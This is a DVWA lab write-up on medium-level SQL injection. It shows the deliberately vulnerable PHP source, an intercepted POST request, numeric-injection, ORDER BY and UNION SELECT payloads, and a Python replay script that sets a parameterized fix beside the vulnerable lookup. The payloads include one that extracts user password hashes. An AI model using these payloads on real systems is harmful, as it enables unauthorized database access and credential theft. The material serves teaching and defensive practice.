DVWA - SQL Injection (medium)

medium.php

SQL Injection Source
vulnerabilities/sqli/source/medium.php


<?php 

if( isset( $_POST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); 

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Display values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

} 

// This is used later on in the index.php page 
// Setting it here so we can close the database connection in here like in the rest of the source scripts 
$query  = "SELECT COUNT(*) FROM users;"; 
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); 
$number_of_rows = mysqli_fetch_row( $result )[0]; 

mysqli_close($GLOBALS["___mysqli_ston"]); 
?> 

1. Changes from the low level to the medium level

1) Change in the code

 $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 

The user-supplied id is now passed through mysqli_real_escape_string() before it is placed in the query. See: the PHP mysqli_real_escape_string() function.

2) Change in the front-end page

The page now uses a drop-down select form instead of a free text field, which restricts what a user can choose in the browser (but not what the browser can be made to send).
[screenshot]

2. Exploitation

Because the drop-down is only a client-side restriction, we can intercept the request with a proxy, change the id parameter, and submit a maliciously constructed value.

POST http://127.0.0.1/dvwa/vulnerabilities/sqli/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/dvwa/vulnerabilities/sqli/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 18
DNT: 1
Host: 127.0.0.1
Pragma: no-cache
Cookie: security=medium; PHPSESSID=5c77n9pgnrr9u9i6383rko2oh6

id=1&Submit=Submit
1) Determine the injection type

Intercept the request and change id to 1' or 1=1 #
[screenshot]
The single quote is escaped to \', the query becomes WHERE user_id = 1\' or 1=1 #; and MySQL returns a syntax error, so a string-style payload fails.
Intercept the request and change id to 1 or 1=1 #
[screenshot] Every user is returned: the injection is numeric.
Because a numeric injection needs no quote characters, and the query interpolates $id without surrounding quotes, mysqli_real_escape_string() (which only escapes quotes, backslashes and a few control characters) places no restriction on the injection we want to perform.

2) Determine the number of columns

[screenshot]
Probing with ORDER BY (1 order by 2 # succeeds, 1 order by 3 # errors) gives the conclusion:
the query selects 2 columns, i.e. First name and Surname.

3) Determine the order in which the columns are displayed

Change id to 1 union select 1,2 #
[screenshot]
The 1 is printed in the First name slot and the 2 in the Surname slot, matching the query in the source: SELECT first_name, last_name FROM users WHERE user_id = $id; Anything selected through a UNION will therefore show up in those two slots.
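As an added example (not code from the original post or from DVWA), the following Python script reproduces the medium.php logic against an in-memory SQLite table with constructed sample users, so steps 1) to 3) above can be replayed offline. mysqli_real_escape_string() is emulated by hand, and because SQLite has no `#` comment the payloads use `-- ` (also valid in MySQL) or simply rely on the `;` that ends the query. A hardened lookup that validates the id and binds it as a parameter is shown beside the vulnerable one; the table layout and row contents are assumptions made for the demo.

```python
import re
import sqlite3

# Constructed sample rows standing in for DVWA's `users` table (not a dump of a real DVWA database).
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "gordonb", "e99a18c4428cb38d5f260853678922e0"),
    (3, "Hack", "Me", "1337", "8d3533d75ae2c3966d7e0d4fcc69216b"),
]


def connect() -> sqlite3.Connection:
    """Return an in-memory SQLite database seeded with SAMPLE_USERS."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return con


def mysqli_real_escape_string(s: str) -> str:
    """Emulate PHP's mysqli_real_escape_string(): backslash-escape NUL, \\n, \\r,
    backslash, single quote, double quote and Ctrl-Z. Digits, spaces, keywords
    and comment markers are left untouched, which is exactly the gap exploited."""
    table = {
        "\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
        "'": "\\'", '"': '\\"', "\x1a": "\\Z",
    }
    return "".join(table.get(ch, ch) for ch in s)


def lookup_medium(con: sqlite3.Connection, user_id: str):
    """medium.php logic: escape the input, then interpolate it UNQUOTED into the query.
    Returns ("ok", rows) or ("error", message), mirroring DVWA's output / mysqli_error()."""
    escaped = mysqli_real_escape_string(user_id)
    query = f"SELECT first_name, last_name FROM users WHERE user_id = {escaped};"
    try:
        return ("ok", con.execute(query).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))


def lookup_fixed(con: sqlite3.Connection, user_id: str):
    """Hardened lookup: accept only an unsigned integer and bind it as a parameter,
    so neither quoting nor escaping matters any more."""
    if not re.fullmatch(r"\d+", user_id):
        return ("rejected", [])
    rows = con.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (int(user_id),)
    ).fetchall()
    return ("ok", rows)


if __name__ == "__main__":
    db = connect()
    for payload in [
        "1",                                          # normal request
        "1' or 1=1 -- ",                              # quote is escaped -> syntax error
        "1 or 1=1",                                   # numeric injection -> every row
        "1 order by 2",                               # 2 columns: fine
        "1 order by 3",                               # 3 columns: error, so the query has 2
        "1 union select 'A','B'",                     # string literals are escaped -> error
        "1 union select 1,2",                         # 1 lands in First name, 2 in Surname
        "1 union select user, password from users",   # pull real data through those slots
    ]:
        print(f"{payload!r:45} medium -> {lookup_medium(db, payload)}")
        print(f"{'':45} fixed  -> {lookup_fixed(db, payload)}")
```

Run it directly to see each payload's result. Note that a UNION payload containing quoted string literals still fails, because the quotes are escaped; on MySQL that is why write-ups for this level use hex literals such as 0x41 or char() for strings, while column names and numbers pass straight through.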
